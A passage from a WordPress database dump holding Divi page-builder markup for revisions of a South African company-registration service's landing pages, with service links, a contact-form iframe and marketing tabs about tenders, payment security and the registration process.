header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"left\" animation_delay=\"200ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-with-a-standard-moi-basic/\" locked=\"off\" _i=\"0\" _address=\"1.1.0\"][/et_pb_blurb][et_pb_blurb title=\"Private Company With Customized MOI\" url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"600ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/private-company-customised-moi-full/\" locked=\"off\" _i=\"1\" _address=\"1.1.1\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\" _i=\"2\" _address=\"1.2\"][et_pb_blurb title=\"Personal Liability Company\" url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" use_icon=\"on\" font_icon=\"%%144%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.27.3\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" animation_style=\"slide\" animation_direction=\"right\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/shop/company-registration/personal-liability-company/\" locked=\"off\" _i=\"0\" _address=\"1.2.0\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"2.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.27.3\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"10%\" hover_enabled=\"0\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"2.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_text _builder_version=\"3.26.6\" _i=\"0\" _address=\"2.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Company Registrations','','inherit','closed','closed','','32664-revision-v1','','','2019-08-22 15:11:13','2019-08-22 13:11:13','',32664,'https://companyregistration.online/32664-revision-v1/',0,'revision','',0),(33116,3,'2019-08-22 15:32:49','2019-08-22 13:32:49','[et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\" fb_built=\"1\" _i=\"0\" _address=\"0\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\" _i=\"1\" _address=\"0.0.0.1\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0.1.0\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"|223px||427px||\" _i=\"1\" _address=\"0.1\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.1.0\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\" _i=\"0\" _address=\"0.1.0.0\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.1.1\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\" _i=\"0\" _address=\"0.1.1.0\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"2\" _address=\"0.1.2\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\" _i=\"0\" _address=\"0.1.2.0\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"3\" _address=\"0.1.3\"][et_pb_cta title=\"Combo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/combo-deals-2\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" header_text_color__hover=\"#ffffff\" header_text_color__hover_enabled=\"on\" background_enable_color__hover=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background__hover_enabled=\"on\" _i=\"0\" _address=\"0.1.3.0\"][/et_pb_cta][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\" fb_built=\"1\" _i=\"1\" _address=\"1\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\" _i=\"0\" _address=\"1.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"1.0.0\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"Encode Sans Semi Condensed||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Encode Sans Semi Condensed|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\" _i=\"0\" _address=\"1.0.0.0\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\" _i=\"1\" _address=\"1.0.0.1\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"1.0.1\"][et_pb_text _builder_version=\"3.27.3\" hover_enabled=\"0\" _i=\"0\" _address=\"1.0.1.0\"]<iframe frameborder=\"0\" style=\"height: 750px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\" fb_built=\"1\" _i=\"2\" _address=\"2\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\" _i=\"0\" _address=\"2.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"2.0.0\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\" _i=\"0\" _address=\"2.0.0.0\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"1\" _address=\"2.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\" _i=\"0\" _address=\"2.0.1.0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\" fb_built=\"1\" _i=\"3\" _address=\"3\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\" _i=\"0\" _address=\"3.0\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\" _i=\"0\" _address=\"3.0.0\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\" _i=\"0\" _address=\"3.0.0.0\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" _i=\"0\" _address=\"3.0.0.0.0\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"1\" _address=\"3.0.0.0.1\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"2\" _address=\"3.0.0.0.2\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"3\" _address=\"3.0.0.0.3\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"4\" _address=\"3.0.0.0.4\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\" _i=\"5\" _address=\"3.0.0.0.5\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section]','Landing style 2','','inherit','closed','closed','','31906-revision-v1','','','2019-08-22 15:32:49','2019-08-22 13:32:49','',31906,'https://companyregistration.online/31906-revision-v1/',0,'revision','',0),(33119,1,'2019-08-22 15:46:12','2019-08-22 13:46:12','[et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\" fb_built=\"1\" _i=\"0\" _address=\"0\"][et_pb_row column_structure=\"1_2,1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0\"][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.0.0\"][et_pb_divider show_divider=\"off\" _builder_version=\"3.26.6\" height=\"125px\" _i=\"0\" _address=\"0.0.0.0\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_text_align=\"center\" header_font_size=\"47px\" _i=\"1\" _address=\"0.0.0.1\"]<h1 style=\"text-align: center;\">What Would You Like To Do ?</h1>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.0.1\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.27.3\" hover_enabled=\"0\" _i=\"0\" _address=\"0.0.1.0\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"3%\" animation_speed_curve=\"ease-in\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" _builder_version=\"3.26.6\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\" custom_margin=\"-26px|223px||427px||\" _i=\"1\" _address=\"0.1\"][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"0\" _address=\"0.1.0\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" background__hover_enabled=\"on\" background_color__hover=\"rgba(196,13,126,0.64)\" background_enable_color__hover=\"on\" header_text_color__hover_enabled=\"on\" header_text_color__hover=\"#ffffff\" _i=\"0\" _address=\"0.1.0.0\"][/et_pb_cta][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.26.6\" _i=\"1\" _address=\"0.1.1\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Encode Sans Condensed|700|||||||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" background_enable_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"0px||||false|false\" custom_padding=\"20px|5px|4px|5px|false|false\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/maintaining-your-company/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" 